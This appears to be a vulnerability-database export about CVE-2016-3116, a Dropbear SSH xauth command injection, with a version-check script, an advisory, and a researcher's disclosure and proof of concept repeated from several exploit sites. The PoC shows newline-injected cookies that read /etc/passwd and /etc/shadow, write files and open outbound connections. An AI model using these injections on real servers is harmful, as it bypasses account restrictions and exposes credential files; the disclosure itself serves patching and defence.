\"Dropbear SSH\", port);\nversion = item[1];\n\n#SSH version : SSH-2.0-dropbear_0.53.1\n#SSH version : SSH-2.0-dropbear_2011.54\nif (version =~ \"^(0|201[1-5])\\.\")\n{\n report_items = make_array(\n \"Version source\", orig_banner,\n \"Installed version\", version,\n \"Fixed version\", \"2016.72\"\n );\n order = make_list(\"Version source\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:report_items, ordered_fields:order);\n security_report_v4(severity:SECURITY_WARNING, port:port, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Dropbear SSH\", port, version);\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3116"], "description": "A vulnerability was found in a way dropbear processed X11 forwarding\ninput. By using a specially crafted request, an attacker could bypass\nthe authorized_keys command restrictions.\n\nxauth is run under the user's privilege, so this vulnerability offers no\nadditional access to unrestricted accounts, but could circumvent key or\naccount restrictions such as sshd_config ForceCommand, authorized_keys\ncommand="..." or restricted shells.", "modified": "2016-03-14T00:00:00", "published": "2016-03-14T00:00:00", "id": "ASA-201603-19", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-March/000584.html", "type": "archlinux", "title": "dropbear: command injection", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "zdt": [{"lastseen": "2018-03-20T00:16:11", "edition": 2, "description": "Exploit for linux platform in category remote exploits", "published": "2016-03-03T00:00:00", "type": "zdt", "title": "DropBearSSHD 2015.71 - Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-03T00:00:00", "id": "1337DAY-ID-25388", "href": "https://0day.today/exploit/description/25388", "sourceData": "VuNote\r\n============\r\n \r\n Author: <github.com/tintinweb>\r\n Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116\r\n Version: 0.2\r\n Date: Mar 3rd, 2016\r\n \r\n Tag: dropbearsshd xauth command injection may lead to forced-command bypass\r\n \r\nOverview\r\n--------\r\n \r\n Name: dropbear\r\n Vendor: Matt Johnston\r\n References: * https://matt.ucc.asn.au/dropbear/dropbear.html [1]\r\n \r\n Version: 2015.71\r\n Latest Version: 2015.71\r\n Other Versions: <= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years)\r\n Platform(s): linux\r\n Technology: c\r\n \r\n Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\r\n Origin: remote\r\n Min. Privs.: post auth\r\n \r\n CVE: CVE-2016-3116\r\n \r\n \r\n \r\nDescription\r\n---------\r\n \r\nquote website [1]\r\n \r\n>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers.\r\n \r\nSummary \r\n-------\r\n \r\nAn authenticated user may inject arbitrary xauth commands by sending an\r\nx11 channel request that includes a newline character in the x11 cookie. \r\nThe newline acts as a command separator to the xauth binary. This attack requires \r\nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.\r\n \r\nBy injecting xauth commands one gains limited* read/write arbitrary files, \r\ninformation leakage or xauth-connect capabilities. These capabilities can be\r\nleveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass \r\naccount restriction. This is generally not expected.\r\n \r\nThe injected xauth commands are performed with the effective permissions of the \r\nlogged in user as the sshd already dropped its privileges. \r\n \r\nQuick-Info:\r\n \r\n* requires: X11Forwarding yes\r\n* does *NOT* bypass /bin/false due to special treatment (like nologin)\r\n* bypasses forced-commands (allows arbitr. read/write)\r\n \r\nCapabilities (xauth):\r\n \r\n* Xauth\r\n * write file: limited chars, xauthdb format\r\n * read file: limit lines cut at first \\s\r\n * infoleak: environment\r\n * connect to other devices (may allow port probing)\r\n \r\n \r\nsee attached PoC\r\n \r\n \r\nDetails\r\n-------\r\n \r\n// see annotated code below\r\n \r\n * x11req (svr-x11fwd.c:46)\r\n \r\n * execchild (svr-chansession.c:893)\r\n *- x11setauth (svr-x11fwd.c:129)\r\n \r\nUpon receiving an `x11-req` type channel request dropbearsshd parses the channel request\r\nparameters `x11authprot` and `x11authcookie` from the client ssh packet where\r\n`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\r\nand `x11authcookie` contains the actual x11 auth cookie. This information is stored\r\nin a session specific datastore. When calling `execute` on that session, dropbear will\r\ncall `execchild` and - in case it was compiled with x11 support - setup x11 forwarding\r\nby executing `xauth` with the effective permissions of the user and pass commands via `stdin`.\r\nNote that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains\r\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\r\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\r\n`xauth` commands.\r\n \r\nThis is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth\r\ncommand injection:\r\n \r\n SYNOPSIS\r\n xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\r\n \r\n add displayname protocolname hexkey\r\n generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\r\n [n]extract filename displayname...\r\n [n]list [displayname...]\r\n [n]merge [filename...]\r\n remove displayname...\r\n source filename\r\n info \r\n exit\r\n quit\r\n version\r\n help\r\n ?\r\n \r\nInteresting commands are:\r\n \r\n info - leaks environment information / path\r\n ~# xauth info\r\n xauth: file /root/.Xauthority does not exist\r\n Authority file: /root/.Xauthority\r\n File new: yes\r\n File locked: no\r\n Number of entries: 0\r\n Changes honored: yes\r\n Changes made: no\r\n Current input: (argv):1\r\n \r\n source - arbitrary file read (cut on first `\\s`)\r\n # xauth source /etc/shadow\r\n xauth: file /root/.Xauthority does not exist\r\n xauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\r\n \r\n extract - arbitrary file write \r\n * limited characters\r\n * in xauth.db format\r\n * since it is not compressed it can be combined with `xauth add` to \r\n first store data in the database and then export it to an arbitrary\r\n location e.g. to plant a shell or do other things.\r\n \r\n generate - connect to <ip>:<port> (port probing, connect back and pot. exploit\r\n vulnerabilities in X.org\r\n \r\n \r\nSource\r\n------\r\n \r\nInline annotations are prefixed with `//#!`\r\n \r\n* handle x11 request, stores cookie in `chansess`\r\n ```c\r\n /* called as a request for a session channel, sets up listening X11 */\r\n /* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */\r\n int x11req(struct ChanSess * chansess) {\r\n \r\n int fd;\r\n \r\n /* we already have an x11 connection */\r\n if (chansess->x11listener != NULL) {\r\n return DROPBEAR_FAILURE;\r\n }\r\n \r\n chansess->x11singleconn = buf_getbyte(ses.payload);\r\n chansess->x11authprot = buf_getstring(ses.payload, NULL); //#! store user tainted data\r\n chansess->x11authcookie = buf_getstring(ses.payload, NULL); //#! store user tainted data\r\n chansess->x11screennum = buf_getint(ses.payload);\r\n ```\r\n \r\n* set auth cookie/authprot\r\n \r\n ```c\r\n /* This is called after switching to the user, and sets up the xauth\r\n * and environment variables. */\r\n void x11setauth(struct ChanSess *chansess) {\r\n \r\n char display[20]; /* space for \"localhost:12345.123\" */\r\n FILE * authprog = NULL;\r\n int val;\r\n \r\n if (chansess->x11listener == NULL) {\r\n return;\r\n }\r\n \r\n ...\r\n \r\n /* popen is a nice function - code is strongly based on OpenSSH's */\r\n authprog = popen(XAUTH_COMMAND, \"w\"); //#! run xauth binary\r\n if (authprog) {\r\n fprintf(authprog, \"add %s %s %s\\n\",\r\n display, chansess->x11authprot, chansess->x11authcookie); //#! \\n injection in cookie, authprot\r\n pclose(authprog);\r\n } else {\r\n fprintf(stderr, \"Failed to run %s\\n\", XAUTH_COMMAND);\r\n }\r\n }\r\n ```\r\n \r\nProof of Concept\r\n----------------\r\n \r\nPrerequisites: \r\n \r\n* install python 2.7.x\r\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\r\n* run `poc.py`\r\n \r\nNote: see cve-2016-3115 [3] for `poc.py`\r\n \r\n Usage: <host> <port> <username> <password or path_to_privkey>\r\n \r\n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n \r\n \r\npoc:\r\n \r\n1. configure one user (user1) for `force-commands`:\r\n ```c \r\n #PUBKEY line - force commands: only allow \"whoami\"\r\n #cat /home/user1/.ssh/authorized_keys\r\n command=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 [email\u00a0protected]\r\n \r\n #cat /etc/passwd\r\n user1:x:1001:1001:,,,:/home/user1:/bin/bash\r\n ```\r\n \r\n2. run dropbearsshd (x11fwd is on by default)\r\n \r\n ```c\r\n #> ~/dropbear-2015.71/dropbear -R -F -E -p 2222\r\n [22861] Not backgrounding\r\n [22862] Child connection from 192.168.139.1:49597\r\n [22862] Forced command 'whoami'\r\n [22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597\r\n ``` \r\n \r\n3. `forced-commands` - connect with user1 and display env information\r\n \r\n ```c\r\n #> python <host> 2222 user1 .demoprivkey\r\n \r\n INFO:__main__:add this line to your authorized_keys file: \r\n #PUBKEY line - force commands: only allow \"whoami\"\r\n #cat /home/user/.ssh/authorized_keys\r\n command=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 [email\u00a0protected]\r\n \r\n INFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222\r\n INFO:__main__:connected!\r\n INFO:__main__:\r\n Available commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n \r\n #> .info\r\n DEBUG:__main__:auth_cookie: '\\ninfo'\r\n DEBUG:__main__:dummy exec returned: None\r\n INFO:__main__:Authority file: /home/user1/.Xauthority\r\n File new: no\r\n File locked: no\r\n Number of entries: 2\r\n Changes honored: yes\r\n Changes made: no\r\n Current input: (stdin):2\r\n user1\r\n /usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n \r\n ...\r\n ```\r\n \r\n4. `forced-commands` - read `/etc/passwd`\r\n \r\n ```c\r\n ...\r\n #> .readfile /etc/passwd\r\n DEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\n DEBUG:__main__:dummy exec returned: None\r\n INFO:__main__:root:x:0:0:root:/root:/bin/bash\r\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\r\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n sync:x:4:65534:sync:/bin:/bin/sync\r\n ...\r\n ```\r\n \r\n5. `forced-commands` - write `/tmp/testfile`\r\n \r\n ```c\r\n #> .writefile /tmp/testfile1 `thisisatestfile`\r\n DEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\r\n DEBUG:__main__:dummy exec returned: None\r\n DEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile1 127.0.0.250:65500'\r\n DEBUG:__main__:dummy exec returned: None\r\n DEBUG:__main__:user1\r\n /usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n \r\n #> INFO:__main__:/tmp/testfile1\r\n \r\n #> ls -lsat /tmp/testfile1\r\n 4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1\r\n \r\n #> cat /tmp/testfile1\r\n \u00fa65500hi\u00fa65500`thisisatestfile`\u00aar\r\n ```\r\n \r\n6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100\r\n \r\n ```c\r\n #> generate 8.8.8.8:100\r\n DEBUG:__main__:auth_cookie: '\\ngenerate 8.8.8.8:100'\r\n DEBUG:__main__:dummy exec returned: None\r\n INFO:__main__:user1\r\n /usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n /usr/bin/xauth: (stdin):2: unable to open display \"8.8.8.8:100\".\r\n \r\n #> tcpdump \r\n IP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0\r\n ``` \r\n \r\nFix\r\n---\r\n \r\n* Sanitize user-tainted input `chansess->x11authcookie`\r\n \r\n \r\nMitigation / Workaround\r\n------------------------\r\n \r\n* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD`\r\n \r\nNotes\r\n-----\r\n \r\nThanks to the OpenSSH team for coordinating the fix!\r\n \r\nVendor response see: changelog [4]\r\n \r\n \r\nReferences\r\n----------\r\n \r\n [1] https://matt.ucc.asn.au/dropbear/dropbear.html\r\n [2] http://linux.die.net/man/1/xauth\r\n [3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/\r\n [4] https://matt.ucc.asn.au/dropbear/CHANGES\r\n \r\nContact\r\n-------\r\n \r\n https://github.com/tintinweb\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25388"}], "exploitdb": [{"lastseen": "2016-07-18T19:13:39", "description": "DropBearSSHD <= 2015.71 - Command Injection. CVE-2016-3116. Remote exploit for Linux platform", "published": "2016-03-03T00:00:00", "type": "exploitdb", "title": "DropBearSSHD <= 2015.71 - Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-03T00:00:00", "id": "EDB-ID:40119", "href": "https://www.exploit-db.com/exploits/40119/", "sourceData": "VuNote\r\n============\r\n\r\n\tAuthor:\t\t<github.com/tintinweb>\r\n\tRef:\t\thttps://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116\r\n\tVersion: \t0.2\r\n\tDate: \t\tMar 3rd, 2016\r\n\t\r\n\tTag:\t\tdropbearsshd xauth command injection may lead to forced-command bypass\r\n\r\nOverview\r\n--------\r\n\r\n\tName:\t\t\tdropbear\r\n\tVendor:\t\t\tMatt Johnston\r\n\tReferences:\t\t* https://matt.ucc.asn.au/dropbear/dropbear.html [1]\r\n\t\r\n\tVersion:\t\t2015.71\r\n\tLatest Version:\t2015.71\r\n\tOther Versions:\t<= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years)\r\n\tPlatform(s):\tlinux\r\n\tTechnology:\t\tc\r\n\r\n\tVuln Classes:\tCWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\r\n\tOrigin:\t\t\tremote\r\n\tMin. Privs.:\tpost auth\r\n\r\n\tCVE:\t\t\tCVE-2016-3116\r\n\r\n\r\n\r\nDescription\r\n---------\r\n\r\nquote website [1]\r\n\r\n>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers.\r\n\r\nSummary \r\n-------\r\n\r\nAn authenticated user may inject arbitrary xauth commands by sending an\r\nx11 channel request that includes a newline character in the x11 cookie. \r\nThe newline acts as a command separator to the xauth binary. This attack requires \r\nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector.\r\n\r\nBy injecting xauth commands one gains limited* read/write arbitrary files, \r\ninformation leakage or xauth-connect capabilities. These capabilities can be\r\nleveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass \r\naccount restriction. This is generally not expected.\r\n\r\nThe injected xauth commands are performed with the effective permissions of the \r\nlogged in user as the sshd already dropped its privileges. \r\n\r\nQuick-Info:\r\n\r\n* requires: X11Forwarding yes\r\n* does *NOT* bypass /bin/false due to special treatment (like nologin)\r\n* bypasses forced-commands (allows arbitr. read/write)\r\n\r\nCapabilities (xauth):\r\n\r\n* Xauth\r\n\t* write file: limited chars, xauthdb format\r\n\t* read file: limit lines cut at first \\s\r\n\t* infoleak: environment\r\n\t* connect to other devices (may allow port probing)\r\n\r\n\r\nsee attached PoC\r\n\r\n\r\nDetails\r\n-------\r\n\r\n// see annotated code below\r\n\r\n\t* x11req (svr-x11fwd.c:46)\r\n \r\n * execchild (svr-chansession.c:893)\r\n *- x11setauth (svr-x11fwd.c:129)\r\n\r\nUpon receiving an `x11-req` type channel request dropbearsshd parses the channel request\r\nparameters `x11authprot` and `x11authcookie` from the client ssh packet where\r\n`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\r\nand `x11authcookie` contains the actual x11 auth cookie. This information is stored\r\nin a session specific datastore. When calling `execute` on that session, dropbear will\r\ncall `execchild` and - in case it was compiled with x11 support - setup x11 forwarding\r\nby executing `xauth` with the effective permissions of the user and pass commands via `stdin`.\r\nNote that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains\r\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\r\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\r\n`xauth` commands.\r\n\r\nThis is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth\r\ncommand injection:\r\n\r\n\tSYNOPSIS\r\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\r\n\r\n\t\tadd displayname protocolname hexkey\r\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\r\n\t\t[n]extract filename displayname...\r\n\t\t[n]list [displayname...]\r\n\t\t[n]merge [filename...]\r\n\t\tremove displayname...\r\n\t\tsource filename\r\n\t\tinfo \r\n\t\texit\r\n\t\tquit\r\n\t\tversion\r\n\t\thelp\r\n\t\t?\r\n\t\t\r\nInteresting commands are:\r\n\t\r\n\tinfo\t - leaks environment information / path\r\n\t\t\t~# xauth info\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\tAuthority file: /root/.Xauthority\r\n\t\t\tFile new: yes\r\n\t\t\tFile locked: no\r\n\t\t\tNumber of entries: 0\r\n\t\t\tChanges honored: yes\r\n\t\t\tChanges made: no\r\n\t\t\tCurrent input: (argv):1\r\n\t\r\n\tsource\t - arbitrary file read (cut on first `\\s`)\r\n\t\t\t# xauth source /etc/shadow\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\r\n\t\t\t\t\t\t\r\n\textract - arbitrary file write \r\n\t\t\t * limited characters\r\n\t * in xauth.db format\r\n\t * since it is not compressed it can be combined with `xauth add` to \r\n\t first store data in the database and then export it to an arbitrary\r\n\t location e.g. to plant a shell or do other things.\r\n\t\r\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\r\n\t\t\t vulnerabilities in X.org\r\n\t\r\n\t\r\nSource\r\n------\r\n\r\nInline annotations are prefixed with `//#!`\r\n\r\n* handle x11 request, stores cookie in `chansess`\r\n\t```c\r\n\t/* called as a request for a session channel, sets up listening X11 */\r\n\t/* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */\r\n\tint x11req(struct ChanSess * chansess) {\r\n\t\r\n\t\tint fd;\r\n\t\r\n\t\t/* we already have an x11 connection */\r\n\t\tif (chansess->x11listener != NULL) {\r\n\t\t\treturn DROPBEAR_FAILURE;\r\n\t\t}\r\n\t\r\n\t\tchansess->x11singleconn = buf_getbyte(ses.payload);\r\n\t\tchansess->x11authprot = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\r\n\t\tchansess->x11authcookie = buf_getstring(ses.payload, NULL);\t\t\t//#! store user tainted data\r\n\t\tchansess->x11screennum = buf_getint(ses.payload);\r\n\t```\r\n\t\r\n* set auth cookie/authprot\r\n\r\n\t```c\r\n\t/* This is called after switching to the user, and sets up the xauth\r\n\t * and environment variables. */\r\n\tvoid x11setauth(struct ChanSess *chansess) {\r\n\t\r\n\t\tchar display[20]; /* space for \"localhost:12345.123\" */\r\n\t\tFILE * authprog = NULL;\r\n\t\tint val;\r\n\t\r\n\t\tif (chansess->x11listener == NULL) {\r\n\t\t\treturn;\r\n\t\t}\r\n\t\r\n\t\t...\r\n\t\r\n\t\t/* popen is a nice function - code is strongly based on OpenSSH's */\r\n\t\tauthprog = popen(XAUTH_COMMAND, \"w\");\t\t\t\t\t\t\t\t\t\t//#! run xauth binary\r\n\t\tif (authprog) {\r\n\t\t\tfprintf(authprog, \"add %s %s %s\\n\",\r\n\t\t\t\t\tdisplay, chansess->x11authprot, chansess->x11authcookie);\t\t//#! \\n injection in cookie, authprot\r\n\t\t\tpclose(authprog);\r\n\t\t} else {\r\n\t\t\tfprintf(stderr, \"Failed to run %s\\n\", XAUTH_COMMAND);\r\n\t\t}\r\n\t}\r\n\t```\r\n\r\nProof of Concept\r\n----------------\r\n\r\nPrerequisites: \r\n\r\n* install python 2.7.x\r\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\r\n* run `poc.py`\r\n\r\nNote: see cve-2016-3115 [3] for `poc.py`\r\n\r\n\t Usage: <host> <port> <username> <password or path_to_privkey>\r\n\t \r\n\t path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n\t \r\n\r\npoc:\r\n\r\n1. configure one user (user1) for `force-commands`:\r\n\t```c \r\n\t#PUBKEY line - force commands: only allow \"whoami\"\r\n\t#cat /home/user1/.ssh/authorized_keys\r\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\r\n\r\n\t#cat /etc/passwd\r\n\tuser1:x:1001:1001:,,,:/home/user1:/bin/bash\r\n\t```\r\n\t \r\n2. run dropbearsshd (x11fwd is on by default)\r\n\r\n\t```c\r\n\t#> ~/dropbear-2015.71/dropbear -R -F -E -p 2222\r\n\t[22861] Not backgrounding\r\n\t[22862] Child connection from 192.168.139.1:49597\r\n\t[22862] Forced command 'whoami'\r\n\t[22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597\r\n\t```\t\r\n\r\n3. `forced-commands` - connect with user1 and display env information\r\n\r\n\t```c\r\n\t#> python <host> 2222 user1 .demoprivkey\r\n\t\r\n\tINFO:__main__:add this line to your authorized_keys file: \r\n\t#PUBKEY line - force commands: only allow \"whoami\"\r\n\t#cat /home/user/.ssh/authorized_keys\r\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\r\n\t\r\n\tINFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222\r\n\tINFO:__main__:connected!\r\n\tINFO:__main__:\r\n\tAvailable commands:\r\n\t .info\r\n\t .readfile <path>\r\n\t .writefile <path> <data>\r\n\t .exit .quit\r\n\t <any xauth command or type help>\r\n\t\r\n\t#> .info\r\n\tDEBUG:__main__:auth_cookie: '\\ninfo'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:Authority file: /home/user1/.Xauthority\r\n\tFile new: no\r\n\tFile locked: no\r\n\tNumber of entries: 2\r\n\tChanges honored: yes\r\n\tChanges made: no\r\n\tCurrent input: (stdin):2\r\n\tuser1\r\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n\t\r\n\t...\r\n\t```\r\n\t\r\n4. `forced-commands` - read `/etc/passwd`\r\n\r\n\t```c\r\n\t...\r\n\t#> .readfile /etc/passwd\r\n\tDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\n\tdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\n\tbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\n\tsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n\tsync:x:4:65534:sync:/bin:/bin/sync\r\n\t...\r\n\t```\r\n\t\t\r\n5. `forced-commands` - write `/tmp/testfile`\r\n\r\n\t```c\r\n\t#> .writefile /tmp/testfile1 `thisisatestfile`\r\n\tDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile1 127.0.0.250:65500'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tDEBUG:__main__:user1\r\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n\t\r\n\t#> INFO:__main__:/tmp/testfile1\r\n\t\r\n\t#> ls -lsat /tmp/testfile1\r\n\t4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1\r\n\t\r\n\t#> cat /tmp/testfile1\r\n\t\u00fa65500hi\u00fa65500`thisisatestfile`\u00aar\r\n\t```\r\n\t\r\n6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100\r\n\r\n\t```c\r\n\t#> generate 8.8.8.8:100\r\n\tDEBUG:__main__:auth_cookie: '\\ngenerate 8.8.8.8:100'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:user1\r\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n\t/usr/bin/xauth: (stdin):2: unable to open display \"8.8.8.8:100\".\r\n\t\r\n\t#> tcpdump \r\n\tIP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0\r\n\t```\t\r\n\r\nFix\r\n---\r\n\r\n* Sanitize user-tainted input `chansess->x11authcookie`\r\n\r\n\r\nMitigation / Workaround\r\n------------------------\r\n\r\n* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD`\r\n\r\nNotes\r\n-----\r\n\r\nThanks to the OpenSSH team for coordinating the fix!\r\n\r\nVendor response see: changelog [4]\r\n\r\n\r\nReferences\r\n----------\r\n\r\n\t[1] https://matt.ucc.asn.au/dropbear/dropbear.html\r\n\t[2] http://linux.die.net/man/1/xauth\r\n\t[3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/\r\n\t[4] https://matt.ucc.asn.au/dropbear/CHANGES\r\n\t\r\nContact\r\n-------\r\n\r\n\thttps://github.com/tintinweb", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40119/"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:41", "description": "", "published": "2016-03-15T00:00:00", "type": "packetstorm", "title": "Dropbear SSHD xauth Command Injection / Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-15T00:00:00", "id": "PACKETSTORM:136251", "href": "https://packetstormsecurity.com/files/136251/Dropbear-SSHD-xauth-Command-Injection-Bypass.html", "sourceData": "`Author: <github.com/tintinweb> \nRef: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116 \nVersion: 0.2 \nDate: Mar 3rd, 2016 \n \nTag: dropbearsshd xauth command injection may lead to forced-command bypass \n \nOverview \n-------- \n \nName: dropbear \nVendor: Matt Johnston \nReferences: 